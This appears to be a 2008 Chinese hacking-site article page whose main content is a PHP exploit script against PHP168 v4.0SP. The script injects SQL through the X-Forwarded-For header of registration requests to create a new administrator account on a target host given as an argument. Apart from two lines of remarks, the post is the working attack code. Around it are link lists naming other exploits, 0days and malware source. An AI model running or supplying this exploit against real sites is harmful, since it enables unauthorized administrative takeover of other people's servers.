·	PHP168 X-Forwarded-For	05-23	·	首页巡警v1.1/1.0 本地提	05-23
·	Firefox安全设置	05-23	·	火眼金睛如何识别系统恶	05-23
·	易联网络为您提供150m美	05-23	·	巧妙查看Windows Server	05-22
·	玩转卡巴斯基的19招，让	05-22	·	建立一个别人不能碰的无	05-21
·	卸诺顿 WinXP丢失IP无法	05-21	·	揭秘灰鸽子运行原理(含手	05-21
·	DIY QQ:想要啥样就改啥样	05-21	·	PCSHARE VIP 2005源代码	05-21
·	NBSI_1.157源代码	05-21	·	刷BIOS到EFI破解，Vista	05-21
·	弘毅网提供100M免费asp空	05-21	·	转移Vista脱机文件减压V	05-20
·	改进BitLocker浅谈Vista	05-20	·	巧妙几招，用好Windows	05-20
·	齐鲁科宇网提供20MB免费	05-20	·	解密网页加密的两个方法	05-19
·	Dedecms getip()的漏洞利	05-19	·	一个弹窗口的流氓软件源	05-19
·	C++ win32 下载者源码	05-19	·	经验谈:Vista高效冲浪，	05-19
·	灵活应用组策略禁用USB	05-19	·	DomainDLX提供100M免费A	05-19
·	MyPhpAdmin 执行攻击者代	05-16	·	PHP安全配置详解	05-16

[推荐]PHP168 X-Forwarded-For的漏洞利用

荐 ★★★★★

PHP168 X-Forwarded-For的漏洞利用

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2008-5-23 10:05:15

漏洞本身的成因没什么好说的，老掉牙的x-forwarded-for的问题，我想这个漏洞很多人都找到了。
因为这个漏洞也有些时间了，当时只是在pc上测试了一下，可能有些错误，有兴趣的同学可以自己研究一下。

以下是引用片段：

<?php
print_r(”
+——————————————————————+
Create New Admin Exploit For php168 v4.0SP\n
amxku.net
+——————————————————————+

“);
if ($argc<4) {
echo “Usage: php “.$argv[0].” host path uid\n”;
echo “host:         target server \n”;
echo “path:         path to php168\n”;
echo “uid:         the user uid\n”;
echo “Example:”;
echo “php “.$argv[0].” www.php168.com / 123345\n”;
die;
}
$host=$argv[1];
$path=$argv[2];
$id=$argv[3]+2;
$cmd = “xxxx’,'0′,’111′,’0′,’1′,”, ”, ‘123′, ‘123′, ‘123′, ‘123′, ‘0′, ”, ‘0′, ”, ”, ”, ”),(’”.$id.“‘, ‘0′, ‘3′, ”, ‘1′, ‘0′, ”, ‘1′, ‘1′, ‘1′, ‘1′, ‘1′, ‘1′, ‘1′, ”, ”, ‘1′, ‘1′, ‘1′, ‘1′, ‘0′, ”, ‘0′, ”, ”, ”, ”)/*”;
$content_1= “username=amxku&email=amxku@msn.com&password=longze&password2=longze&bday_y=&bday_m=&bday_d=&sex=0&oicq=&msn=&homepage=&Submit3=%CC%E1+%BD%BB&step=2″;
$content_2= “username=amxku&email=amxku@msn.com&password=longze&password2=longze&bday_y=&bday_m=&bday_d=&sex=0&oicq=&msn=&homepage=&Submit3=%CC%E1+%BD%BB&step=2″;
senddate($content_1);
senddate($content_2);
function senddate($content){
global $path,$host,$cmd;
$data = “POST “.$path.“reg.php”.” HTTP/1.1″;
$data .= “Accept: */*”;
$data .= “Accept-Language: zh-cn”;
$data .= “Content-Type: application/x-www-form-urlencoded”;
$data .= “User-Agent: Mozilla/4.0″;
$data .= “Host: “.$host.“”;
$data .= “x-forwarded-for: “.$cmd.“”;
$data .= “Content-length: “.strlen($content).“”;
$data .= “Connection: Keep-Alive”;
$data .= “”;
$data .= $content.“”;
$sendto=fsockopen($host,80);
if (!$sendto) {
echo ‘No response from ‘.$host;
die;
}
fputs($sendto,$data);
fclose($sendto);
};
echo “Create a successful administrator\n amxku.net”;
?>

文章录入：cainiaowang 责任编辑：xinlian

上一篇文章：首页巡警v1.1/1.0 本地提权漏洞

下一篇文章：没有了

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

VIP 专区

新云CMS Online.asp页面过滤不严	02-26
对网软网上购物系统的漏洞分析	01-09
测试SQL防注入脚本	12-21
Google Xss又出跨站新漏洞	11-06
一次简单的html injection导致的	11-06
风讯、科讯漏洞利用	11-01
Adobe pdf reader URI利用方式浅	10-23
超星阅览器的最新0DAY	10-19
运用SQL Injection做数据库渗透的	09-22
sa-blog 0day	09-22
HTML注入的一些简单想法	09-10
网站登陆接口的攻与防	09-04